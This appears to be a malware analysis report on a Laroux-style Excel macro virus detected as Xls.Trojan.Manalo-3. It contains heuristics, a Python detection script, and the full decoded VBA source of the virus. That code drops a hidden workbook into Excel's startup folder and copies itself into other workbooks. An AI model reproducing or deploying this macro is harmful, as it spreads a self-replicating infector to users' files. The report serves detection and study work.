Verdict: MALICIOUS
Risk Score: 240

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
This Excel 5 macro virus, detected by ClamAV as Xls.Trojan.Manalo-3, is a Laroux-style infector. Its Auto_Open macro does not infect directly: it registers the Jacob procedure as the Application.OnSheetActivate handler, so the infection routine runs the next time any sheet is activated. Jacob checks Application.StartupPath for 'C B I.XLS'. If that file is absent, it creates a new workbook, copies the hidden 'Life_Blood' (macro) and 'INC' sheets into it, hides the window, and saves the workbook as 'C B I.XLS' in the Excel startup path, from which Excel loads it on every start (the persistence mapped to T1547.001). If the dropper is already present, it instead copies those sheets from 'C B I.XLS' into the active workbook (adding a third hidden sheet named '85 Years'), hides them, and re-points OnSheetActivate at 'C B I.XLS!Jacob' so the dropper, not the document, carries the hook from then on. A date comparison against '99 07 27' is present, but it uses a two-digit year compared as a string and, in the extracted code, only governs whether the '85 Years' sheet is re-hidden; no further payload is visible in the macro shown below. The embedded text 'manalo-e' and the ClamAV detection name support the family attribution.
Heuristics (4)

- ClamAV: Xls.Trojan.Manalo-3 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Trojan.Manalo-3
- Excel 5 Laroux/Larou-CV macro-virus marker cluster (critical, OLE_XLS5_LAROUX_MACRO_VIRUS): Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster, including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
- VBA macros detected (medium, OLE_VBA_MACROS; 1 related finding): Document contains VBA macro code
- Auto_Open macro (high, OLE_VBA_AUTO): The workbook contains an Auto_Open macro, which Excel runs automatically when the file is opened unless macros are disabled.
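The summary and the OLE_XLS5_LAROUX_MACRO_VIRUS heuristic above both describe a marker cluster rather than a single string. As an added example that is not part of this report, the analyzer, or ClamAV, the Python below applies that kind of check to decoded VBA source of the sort olevba writes out as macros.bas. The marker names, the regular expressions, the "replication core" rule and the two embedded samples are all constructed for this example; the infected sample is an excerpt of the macro shown on this page, and the benign one is a made-up Auto_Open that only switches sheets.

```python
"""Static triage of decoded VBA for a Laroux-style Excel macro virus.

Added example, not the analyzer's or ClamAV's code. Marker names, regexes
and the two embedded samples are constructed for this example.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# One regex per marker in the cluster; a hit means the string is present.
MARKERS = {
    "auto_open": re.compile(r"^\s*Sub\s+Auto_Open\s*\(", re.I | re.M),
    "onsheetactivate_hook": re.compile(r"Application\.OnSheetActivate\s*=", re.I),
    "startup_path": re.compile(r"Application\.StartupPath", re.I),
    "saveas_to_startup": re.compile(
        r"\.SaveAs\s+FileName:=\s*Application\.StartupPath", re.I),
    "sheet_copy": re.compile(
        r'\.Sheets\("[^"]+"\)\.Copy\s+(?:Before|After):=', re.I),
    "hide_sheet": re.compile(r"\.Visible\s*=\s*False", re.I),
}

# Replication core: auto-start, a drop into the startup path, and sheet
# copying. Without all four this is just a workbook with macros, not an
# infector; requiring them keeps the indicator narrow.
CORE = ("auto_open", "startup_path", "saveas_to_startup", "sheet_copy")

# Name of the dropper written into the startup path.
DROP_NAME = re.compile(
    r'SaveAs\s+FileName:=\s*Application\.StartupPath\s*&\s*"[\\/]"\s*&\s*"([^"]+)"',
    re.I)
# Two-digit-year date trigger compared as a string (Laroux-style).
DATE_TRIGGER = re.compile(
    r'Format\(Now\(\),\s*"yy mm dd"\)\s*>=\s*"([0-9 ]+)"', re.I)


@dataclass
class Triage:
    hits: List[str]
    drop_file: Optional[str]
    date_trigger: Optional[str]
    laroux_like: bool


def triage_vba(src: str) -> Triage:
    """Score decoded VBA source text against the marker cluster."""
    hits = [name for name, rx in MARKERS.items() if rx.search(src)]
    drop = DROP_NAME.search(src)
    date = DATE_TRIGGER.search(src)
    return Triage(
        hits=hits,
        drop_file=drop.group(1) if drop else None,
        date_trigger=date.group(1) if date else None,
        laroux_like=all(m in hits for m in CORE),
    )


def triage_file(path: str) -> Triage:
    """Triage a decoded macro dump such as olevba's macros.bas output."""
    with open(path, "r", encoding="latin-1", errors="replace") as fh:
        return triage_vba(fh.read())


# Constructed excerpt of the macro extracted on this page (macros.bas).
SAMPLE_INFECTED = r'''Attribute VB_Name = "Life_Blood"
Sub Auto_Open()
Application.OnSheetActivate = "Jacob"
End Sub
Sub Jacob()
Startup$ = Application.StartupPath
File$ = Dir(Startup$ & "\" & "C B I.XLS")
If File$ <> "C B I.XLS" Then GoTo FileDoesNotExist Else GoTo InfectOpenFile
FileDoesNotExist:
Infected$ = ActiveWorkbook.Name
Set newBook = Workbooks.Add
NewWorkbook$ = ActiveWorkbook.Name
Workbooks(Infected$).Sheets("INC").Copy Before:=Workbooks(NewWorkbook$).Sheets(1)
Workbooks(NewWorkbook$).Sheets("Life_Blood").Visible = False
Workbooks(NewWorkbook$).SaveAs FileName:=Application.StartupPath & "/" & "C B I.XLS"
GoTo Finish
InfectOpenFile:
If Format(Now(), "yy mm dd") >= "99 07 27" Then
End If
Finish:
Application.OnSheetActivate = "C B I.XLS!Jacob"
End Sub
'''

# Constructed benign macro: an Auto_Open alone must not trip the verdict.
SAMPLE_BENIGN = '''Sub Auto_Open()
    Sheets("Summary").Activate
    MsgBox "Report loaded"
End Sub
'''

if __name__ == "__main__":
    for label, src in (("infected", SAMPLE_INFECTED), ("benign", SAMPLE_BENIGN)):
        print(label, triage_vba(src))
```

Point triage_file at the text olevba extracts and read the verdict together with the drop file name and any date trigger; a laroux_like result requires the whole replication core, so a report workbook that merely carries an Auto_Open stays below the bar.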
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13263 bytes |

SHA-256: 31cadf8e5cba74200e98976ae73bb90d01cb94377206447a968a45db6ae3a0a7
Detection: ClamAV: Xls.Trojan.Manalo-3
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "Life_Blood"
'
' INC v1.0
'
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
Application.OnSheetActivate = "Jacob"
End Sub
Sub Jacob()
Attribute Jacob.VB_ProcData.VB_Invoke_Func = " \n14"
Startup$ = Application.StartupPath
File$ = Dir(Startup$ & "\" & "C B I.XLS")
If File$ <> "C B I.XLS" Then GoTo FileDoesNotExist Else GoTo InfectOpenFile
FileDoesNotExist:
Infected$ = ActiveWorkbook.Name
Application.ScreenUpdating = False
Set newBook = Workbooks.Add
With newBook
.Title = ""
.Subject = ""
End With
NewWorkbook$ = ActiveWorkbook.Name
Sheet$ = Workbooks(NewWorkbook$).Sheets(1).Name
If Sheet$ <> "Life_Blood" _
Then
Workbooks(Infected$).Sheets("INC").Copy Before:=Workbooks(NewWorkbook$).Sheets(1)
Workbooks(Infected$).Sheets("Life_Blood").Copy Before:=Workbooks(NewWorkbook$).Sheets("INC")
Workbooks(NewWorkbook$).Sheets("Life_Blood").Visible = False
Workbooks(NewWorkbook$).Sheets("INC").Visible = False
Else
End If
ActiveWindow.Visible = False
Workbooks(NewWorkbook$).SaveAs FileName:=Application.StartupPath & "/" & "C B I.XLS"
GoTo Finish
InfectOpenFile:
FileName$ = ActiveWorkbook.Name
FirstSheet$ = Workbooks(FileName$).Sheets(1).Name
Application.ScreenUpdating = False
If FirstSheet$ <> "Life_Blood" _
Then
Workbooks("C B I.XLS").Sheets("Life_Blood").Copy Before:=Workbooks(FileName$).Sheets(1)
Workbooks("C B I.XLS").Sheets("INC").Copy After:=Workbooks(FileName$).Sheets("Life_Blood")
Workbooks(FileName$).Sheets("INC").Name = "85 Years"
Workbooks("C B I.XLS").Sheets("INC").Copy Before:=Workbooks(FileName$).Sheets("85 Years")
Workbooks(FileName$).Sheets("Life_Blood").Visible = False
Workbooks(FileName$).Sheets("INC").Visible = False
Workbooks(FileName$).Sheets("85 Years").Visible = False
Else
End If
If Format(Now(), "yy mm dd") >= "99 07 27" Then
Else: Workbooks(FileName$).Sheets("85 Years").Visible = False
End If
Finish:
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "C B I.XLS!Jacob"
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet16"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet17"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable
```

... (truncated)
| Filename | Kind | Source | Size |
|---|---|---|---|
| ole10native_00.bin | ole-package | OLE Ole10Native stream: MBD00001D5F/Ole10Native | 38180 bytes |

SHA-256: 764d7393b19744a570246d85899ec3f9049322d7d83c9f6cf618c1008f179e74